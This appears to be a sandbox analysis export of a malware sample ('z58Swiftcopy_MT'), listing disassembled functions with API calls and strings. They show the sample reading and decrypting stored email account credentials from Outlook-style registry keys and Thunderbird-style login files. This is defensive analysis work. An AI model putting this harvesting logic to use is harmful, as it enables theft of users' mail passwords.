                                                                                                                                                                                                                                      Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A4C,?,?,0040412F,?,?,004041E4), ref: 004047DA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2238633743-192783356
                                                                                                                                                                                                                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                                                                                                                                                                      Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfileString_mbscmpstrlen
                                                                                                                                                                                                                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                                                                                                                                                                      • API String ID: 3963849919-1658304561
                                                                                                                                                                                                                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                                                                                                                                                                      Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                                                                      • String ID: (yE$(yE$(yE
                                                                                                                                                                                                                                      • API String ID: 1865533344-362086290
                                                                                                                                                                                                                                      • Opcode ID: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 644c9f1e151c47db51b33def850b2c93cd31f25a94bfc045a311b8f4a1212760
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                                                                                                                                                                      Function 00443C71 Relevance: 69.3, APIs: 23, Strings: 23, Instructions: 313stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: strcmp$_strcmpi$memcpystrlenstrtoul
                                                                                                                                                                                                                                      • String ID: Account_Name$IMAP$IMAP_Port$IMAP_Secure_Connection$IMAP_Server$IMAP_User_Name$NNTP$NNTP_Email_Address$NNTP_Port$NNTP_Secure_Connection$NNTP_Server$NNTP_User_Name$POP3$POP3_Port$POP3_Secure_Connection$POP3_Server$POP3_User_Name$SMTP$SMTP_Email_Address$SMTP_Port$SMTP_Secure_Connection$SMTP_Server$SMTP_User_Name
                                                                                                                                                                                                                                      • API String ID: 1714764973-479759155
                                                                                                                                                                                                                                      • Opcode ID: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                      • Instruction ID: 3e95309f0516475de87f4a3b36a82bfae981417ea13aa6096d07c622cb899a74
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d90af57251aac8a93e41199de06fc6046491669e53ae360ecbf61914d176b5eb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FB91A9726087056AF224BB36DD43B9F33D8EF4071DF20042FF85AA6182EE6DBA05461D
                                                                                                                                                                                                                                      Function 0040E934 Relevance: 68.7, APIs: 26, Strings: 13, Instructions: 483COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EBD8
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC2B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EC47
                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                                                                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECDD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040ECF2
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED59
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,0040F26F), ref: 0040ED6F
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040ED85
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040ED9B
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDB1
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 0040EDC7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040EDE1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                                                                                                                                                                                                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                                                                                                                                                                                                                      • API String ID: 3137614212-1455797042
                                                                                                                                                                                                                                      • Opcode ID: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c733d411cb0ddce6aec5d68f75c20dd57854b7067a58d20dabe3d797972b5ab3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                                                                                                                                                                                                                      Function 0040DD7B Relevance: 66.3, APIs: 28, Strings: 16, Instructions: 303stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _strcmpi$strlen$strncmp$atoimemcpy$memset
                                                                                                                                                                                                                                      • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$mail.smtpserver$port$server$signon.signonfilename$smtpserver$true$type$useSecAuth$useremail$username
                                                                                                                                                                                                                                      • API String ID: 2814039832-2206097438
                                                                                                                                                                                                                                      • Opcode ID: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                      • Instruction ID: f11149d289dc999bf060bfe26817f696df6097fe02de34603fea895fe08660a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 451ab8c14819fa341940ae35f9fedda05794e6cbdd5fcb9fbbdf8a0f2c3a169f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 11A1C932804206BAFF14ABA6DD02B9E77A4DF50328F20447FF405B71D1EB79AE55964C
                                                                                                                                                                                                                                      Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                                                                                                                                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                                                                                                                                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                                                                                                                                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                                                                                                                                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5B8
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E5CD
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E634
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E64A
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E660
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E676
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E68C
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,httpRealm,passwordField,usernameField,encryptedPassword,encryptedUsername,hostname,?,?,?,?,?,0040F28D), ref: 0040E69F
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6B5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E6CC
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                                                                                                                                                        • Part of subcall function 004066A3: memcmp.MSVCRT(?,00456EA0,00000010,?,?,000000FF), ref: 004066EE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E736
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E74F
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E76D
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E788
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E79E
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040E858
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040E873
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E889
                                                                                                                                                                                                                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                                                                                                                                                                                                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                                                                                                                                                                                                                      • API String ID: 4171719235-3943159138
                                                                                                                                                                                                                                      • Opcode ID: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d167a2cf797b5d1909f19c572c007443fa0765fe7e0db263b7bd4f21149122ce
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                                                                                                                                                                                                                      Function 00410401 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                                                                                                                                                                                                                      • GetDC.USER32 ref: 004104E2
                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00410522
                                                                                                                                                                                                                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 00410640
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                                                                                                                                                                                                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00410737
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                                                                                                                                                                                                      • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                                                                      • API String ID: 1703216249-3046471546
                                                                                                                                                                                                                                      • Opcode ID: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c45e47aa9121f830d125028a7f876627aec3aac4030610de851cfdb352c947b7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                                                                                                                                                                                                                      Function 0040244A Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 132COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004024F5
                                                                                                                                                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000,?,?,?,7693E430,?,00000000), ref: 00402533
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004025FD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _mbscpy$QueryValuememset
                                                                                                                                                                                                                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                                                                                                                                                                                                                      • API String ID: 168965057-606283353
                                                                                                                                                                                                                                      • Opcode ID: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1065c6c96e973ba162a7e339d79e3b52940ae0a945bba20f0fb5bc86a04de48d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                                                                                                                                                                                                                      Function 004027BE Relevance: 45.6, APIs: 3, Strings: 23, Instructions: 122COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00402869
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,7693E430,?,00000000), ref: 004028A3
                                                                                                                                                                                                                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,7693E430,?,00000000), ref: 0040297B
                                                                                                                                                                                                                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.28454828693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000004.00000002.28454828693.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                                                                                                                                                                                                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                                                                                                                                                                                                                      • API String ID: 1497257669-167382505
                                                                                                                                                                                                                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                                                                                                                                                                                                                      Function 0040FC40 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 220windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                                                                                                                                                                                                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FCFD
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD1D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD3B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD54
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD72
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FD8B
                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                                                                                                                                                                                                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040FE45
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00457E70,00000118), ref: 0040FE82
                                                                                                                                                                                                                                      • _mbscpy.MSVCRT(?,00000000), ref: 0040FEA4
                                                                                                                                                                                                                                      • sprintf.MSVCRT ref: 0040FF0F
